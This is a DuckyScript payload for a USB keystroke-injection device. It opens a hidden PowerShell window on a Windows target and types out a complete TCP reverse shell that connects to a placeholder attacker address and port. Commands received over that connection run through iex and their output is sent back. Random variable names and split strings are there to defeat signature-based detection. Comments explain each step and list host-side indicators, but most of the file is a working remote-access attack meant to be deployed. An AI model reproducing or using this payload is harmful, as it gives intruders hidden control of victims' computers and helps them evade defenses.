REM Title: ReverseDuckyPolymorph
2
REM Author: 0i41E, Korben
3
REM Version 1.1
4
5
REM Target: Windows / Linux(?) (Not tested with Powershell on Linux)
6
REM Requirements: DuckyScript 3.0, PayloadStudio v. 1.3.0 minimum
7
8
REM Description:
9
REM TCP Reverse shell executed hidden in the background,
10
REM the CAPSLOCK light at the end will indicate that the payload was executed.
11
REM Because the PowerShell variable names are assembled from random keycodes
REM at run time (see the $var_* block further down), the typed text differs on
REM every run, which impedes static (signature-based) detection of the keystrokes.
REM The string splitting ('New'+'-Obj'+'ect', 'ie'+'x', ...) only changes what is
REM typed; the resolved cmdlets and types are unchanged and remain observable by
REM run-time telemetry such as PowerShell script block logging.
12
REM DON'T FORGET TO START LISTENER BEFORE DEPLOYING ON TARGET
13
14
REM REQUIRED: Define the attacker's IP & Port
REM ADDRESS is a placeholder ('0.0.0.0' is not a usable listener address) and
REM must be replaced; PORT is 4444 by default. Both are substituted verbatim
REM into the TCPClient( ADDRESS , PORT ) call below, so the quotes on ADDRESS
REM are required and PORT must stay an unquoted number.
15
DEFINE ADDRESS '0.0.0.0'
16
DEFINE PORT 4444
17
18
REM Extension DETECT_READY by Korben for best and fastest deployment
EXTENSION DETECT_READY
20
REM VERSION 1.0
21
22
REM USAGE:
23
REM Extension runs inline (here)
24
REM Place at beginning of payload (besides ATTACKMODE) to act as dynamic
25
REM boot delay
26
27
REM TARGETS:
28
REM Any system that reflects CAPSLOCK will detect minimum required delay
29
REM Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
30
31
REM CONFIGURATION:
32
REM RESPONSE_DELAY: milliseconds between CAPSLOCK presses.
REM ITERATION_LIMIT: maximum number of presses; 120 * 25 ms = 3000 ms worst case.
DEFINE RESPONSE_DELAY 25
33
DEFINE ITERATION_LIMIT 120
34
35
REM Press CAPSLOCK repeatedly until the host reports the CAPSLOCK LED as on
REM ($_CAPSLOCK_ON) or ITERATION_LIMIT presses have been sent. The first
REM reflected LED state means the host has enumerated the HID device and is
REM accepting input. Note that a burst of CAPSLOCK toggles from a freshly
REM enumerated keyboard, before any other input, is itself a host-side artifact.
VAR $C = 0
36
WHILE (($_CAPSLOCK_ON == FALSE) && ($C < ITERATION_LIMIT))
37
CAPSLOCK
38
DELAY RESPONSE_DELAY
39
$C = ($C + 1)
40
END_WHILE
41
REM One more press, presumably to return CAPSLOCK to off after the loop left
REM it on. This press is unconditional, so if the limit was hit without the
REM LED ever being reflected the host's CAPSLOCK state may end up toggled.
CAPSLOCK
42
END_EXTENSION
REM Variables for pseudo random variables
45
REM Each $var_* below is sampled once from a random keycode and then re-injected
REM with INJECT_VAR wherever the same PowerShell identifier is needed, so every
REM reference to a given identifier is spelled the same within one run and
REM differently between runs. The identifiers assembled below are:
REM   $<gibberish><gibberish2><gibberish3><gibberish4>  = [Text.Encoding] type
REM   $<gibb3rish>                                       = the TCPClient
REM   $<gibberish4>                                      = its network stream
REM   $<gibberish4><gibberish3><gibberish><duckID3>      = bytes read per loop
REM   $<duckID3><gibberish2><gibb3rish>                  = ASCII bytes sent back
REM   Ducky_<duckID><duckID2><duckID3>                   = tag shown in the prompt
VAR $var_gibberish = $_RANDOM_NUMBER_KEYCODE
46
VAR $var_gibberish2 = $_RANDOM_LETTER_KEYCODE
47
VAR $var_gibberish3 = $_RANDOM_LOWER_LETTER_KEYCODE
48
VAR $var_gibberish4 = $_RANDOM_LETTER_KEYCODE
49
VAR $var_gibb3rish = $_RANDOM_NUMBER_KEYCODE
50
VAR $var_duckID = $_RANDOM_UPPER_LETTER_KEYCODE
51
VAR $var_duckID2 = $_RANDOM_NUMBER_KEYCODE
52
VAR $var_duckID3 = $_RANDOM_NUMBER_KEYCODE
53
54
REM Fixed settle time after DETECT_READY, then open the Run dialog.
DELAY 1500
55
GUI r
56
DELAY 500
57
REM Start PowerShell with no profile (-NoP), non-interactive (-NonI) and a
REM hidden window (-w h); everything after this is typed into that hidden
REM session. A hidden-window PowerShell launched from the Run dialog shortly
REM after a new HID keyboard enumerates is the host-side artifact to look for.
STRINGLN powershell -NoP -NonI -w h
58
DELAY 500
59
REM The whole shell is typed as one line; it only runs when Enter is sent by
REM the STRINGLN near the end.
REM Assign the [Text.Encoding] type to the first random identifier. The type
REM name is split and mixed-case only to alter the typed text.
STRING $
60
INJECT_VAR $var_gibberish
61
INJECT_VAR $var_gibberish2
62
INJECT_VAR $var_gibberish3
63
INJECT_VAR $var_gibberish4
64
STRING =[TyPE]('tExT'+'.enCOD'+'InG');$
65
INJECT_VAR $var_gibb3rish
66
REM Address and Port of the listening machine
REM This is the outbound TCP connection from the PowerShell process to
REM ADDRESS:PORT and the network indicator of the payload; egress filtering
REM towards the listener port prevents the shell from connecting.
67
STRING =.('New'+'-Obj'+'ect') System.Net.Sockets.TCPClient( ADDRESS , PORT );$
68
INJECT_VAR $var_gibberish4
69
STRING =$
70
INJECT_VAR $var_gibb3rish
71
REM Take the client's stream, build a 64 KiB zero-filled receive buffer
REM (0..65535 piped through % = ForEach-Object) and loop while Read returns
REM a non-zero byte count.
STRING .GetStream();[byte[]]$b=0..65535|&('%'){0};while(($
72
INJECT_VAR $var_gibberish4
73
INJECT_VAR $var_gibberish3
74
INJECT_VAR $var_gibberish
75
INJECT_VAR $var_duckID3
76
STRING =$
77
INJECT_VAR $var_gibberish4
78
REM Decode each received chunk as ASCII into $d.
STRING .Read($b,0,$b.Length))-ne 0){;$d=(&('New'+'-Ob'+'ject') -TypeName System.Text.ASCIIEncoding).GetString($b,0,$
79
INJECT_VAR $var_gibberish4
80
INJECT_VAR $var_gibberish3
81
INJECT_VAR $var_gibberish
82
INJECT_VAR $var_duckID3
83
REM Execute the chunk with iex, capture stdout and stderr (2>&1) through
REM Out-String, then append a prompt of the form 'Ducky_<tag>@PS <cwd>> '
REM (gl = Get-Location).
STRING );$X=(&('ie'+'x') $d 2>&1 | .('Out'+'-St'+'ring'));$Z=$X+'Ducky_
84
INJECT_VAR $var_duckID
85
INJECT_VAR $var_duckID2
86
INJECT_VAR $var_duckID3
87
STRING @PS '+(&('g'+'l'))+'> ';$
88
INJECT_VAR $var_duckID3
89
INJECT_VAR $var_gibberish2
90
INJECT_VAR $var_gibb3rish
91
STRING =($
92
INJECT_VAR $var_gibberish
93
INJECT_VAR $var_gibberish2
94
INJECT_VAR $var_gibberish3
95
INJECT_VAR $var_gibberish4
96
REM Encode the response as ASCII bytes, write and flush them to the stream,
REM then go back to waiting for the next chunk.
STRING ::ASCII).GetBytes($Z);$
97
INJECT_VAR $var_gibberish4
98
STRING .Write($
99
INJECT_VAR $var_duckID3
100
INJECT_VAR $var_gibberish2
101
INJECT_VAR $var_gibb3rish
102
STRING ,0,$
103
INJECT_VAR $var_duckID3
104
INJECT_VAR $var_gibberish2
105
INJECT_VAR $var_gibb3rish
106
STRING .Length);$
107
INJECT_VAR $var_gibberish4
108
STRING .Flush()};$
109
INJECT_VAR $var_gibb3rish
110
REM Once Read returns 0 (listener side closed), close the client and exit
REM the hidden PowerShell. The Enter sent here runs the whole line.
STRINGLN .Close();exit
111
DELAY 100
112
REM Completion indicator: toggle CAPSLOCK so the LED changes state. This
REM keystroke is sent unconditionally, so it only confirms that the keystrokes
REM were delivered, not that the connection to the listener succeeded.
CAPSLOCK